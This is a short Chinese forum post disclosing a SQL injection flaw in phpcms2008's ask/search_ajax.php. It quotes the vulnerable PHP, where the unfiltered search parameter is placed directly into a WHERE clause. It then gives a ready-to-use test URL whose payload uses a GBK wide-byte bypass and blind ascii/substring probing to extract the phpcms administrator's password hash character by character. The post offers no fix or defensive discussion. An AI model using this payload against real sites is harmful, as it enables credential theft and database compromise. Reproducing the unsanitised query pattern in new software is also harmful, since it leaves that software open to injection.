phpcms2008 注入漏洞
这个是最新有人发现的 <br /><br />该漏洞文件:ask/search_ajax.php <br /><br />漏洞说明: <br />/ask/search_ajax.php <br />Code: <br /><br />if($q) <br />{ <br />$where = " title LIKE '%$q%' AND status = 5";//没做过滤直接感染了$where <br />} <br />else <br />{ <br />exit('null'); <br />} <br />$infos = $ask->listinfo($where, 'askid DESC', '', 10); <br />/ask/include/answer.class.php <br />Code: <br /><br />function listinfo($where = '', $order = '', $page = 1, $pagesize = 50) <br />{ <br />if($where) $where = " WHERE $where"; <br />if($order) $order = " ORDER BY $order"; <br />$page = max(intval($page), 1); <br />$offset = $pagesize*($page-1); <br />$limit = " LIMIT $offset, $pagesize"; <br />$r = $this->db->get_one("SELECT count(*) as number FROM $this->table_posts $where"); <br />$number = $r['number']; <br />$this->pages = pages($number, $page, $pagesize); <br />$array = array(); <br />$i = 1; <br />$result = $this->db->query("SELECT * FROM $this->table_posts $where $order $limit"); <br />while($r = $this->db->fetch_array($result)) <br />{ <br />$r['orderid'] = $i; <br />$array[] = $r; <br />$i++; <br />} <br />$this->number = $this->db->num_rows($result); <br />$this->db->free_result($result); <br />return $array; <br />} <br />测试方法: <br />/ask/search_ajax.php?q=s%D5'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23 <br />
頁:
[1]